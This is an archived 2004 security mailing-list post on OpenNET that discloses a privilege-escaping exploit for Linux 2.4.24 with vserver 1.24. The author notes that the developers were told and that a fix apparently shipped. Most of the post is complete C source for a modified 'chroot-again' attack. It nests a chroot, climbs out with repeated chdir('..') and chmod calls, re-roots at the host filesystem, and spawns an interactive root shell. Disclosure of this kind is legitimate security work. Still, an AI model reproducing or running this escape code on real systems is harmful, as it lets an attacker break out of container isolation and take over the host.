The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Linux 2.4.24 with vserver 1.24 exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Fri, 06 Feb 2004 08:58:01 +0100
From: =?ISO-8859-1?Q?Markus_M=FCller?= <[email protected]>
To: [email protected]
Subject: Linux 2.4.24 with vserver 1.24 exploit

Hi securityfocus,

a small exploit from me which brakes out of a vserver, also if secured 
with "chmod 000 /vservers". It is a modification of the known 
"chroot-again" exploit. It belongs to chroots but also to the vserver 
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted 
to the developers, and in the today released version 1.25 it seems to be 
fixed.

/* [email protected] modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <sys/types.h>
#include <sys/stat.h>

main()
{
 int i;

 if (chdir("/") != 0) {
   perror("cd /"); exit(1);
 }
 if (mkdir("baz", 0777) != 0) {
   perror("mkdir baz");
 }
 if (chroot("baz") != 0) {
   perror("chroot baz"); exit(1);
 }
 
 for (i=0; i<50; i++) {
    if (chdir("..") != 0) {
       perror("cd .."); /* exit(1); */
    }
    if (chmod("..", S_IXOTH) != 0) {
       perror("chmod"); /* exit(1); */
    }
 }
 if (chroot(".") != 0) {
   perror("chroot ."); exit(1);
 }
 printf("Exploit seems to work. =)\n");
 execl("/bin/sh", "sh", "-i", (char *)0);
 perror("exec sh");
 exit(0);
}

The developers have been noticed.

Greetings,
Markus MЭller
GeNUA mbH

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру